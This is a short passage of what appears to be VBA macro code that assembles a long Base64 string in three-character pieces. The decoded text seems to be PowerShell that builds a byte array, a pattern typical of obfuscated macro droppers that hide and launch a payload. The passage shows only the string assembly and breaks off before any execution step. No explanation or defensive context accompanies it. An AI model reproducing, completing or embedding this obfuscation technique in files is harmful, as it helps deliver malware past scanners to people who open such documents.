   Str = Str & "BzA"
   Str = Str & "G8A"
   Str = Str & "bgA"
   Str = Str & "pAA"
   Str = Str & "oAe"
   Str = Str & "wAK"
   Str = Str & "ACA"
   Str = Str & "AIA"
   Str = Str & "AgA"
   Str = Str & "CAA"
   Str = Str & "JAB"
   Str = Str & "iAH"
   Str = Str & "kAd"
   Str = Str & "ABl"
   Str = Str & "AHM"
   Str = Str & "AIA"
   Str = Str & "A9A"
   Str = Str & "CAA"
   Str = Str & "WwB"
   Str = Str & "iAH"
   Str = Str & "kAd"
   Str = Str & "ABl"
   Str = Str & "AFs"
   Str = Str & "AXQ"
   Str = Str & "BdA"
   Str = Str & "FsA"
   Str = Str & "YwB"
   Str = Str & "oAG"
   Str = Str & "EAc"
   Str = Str & "gBb"
…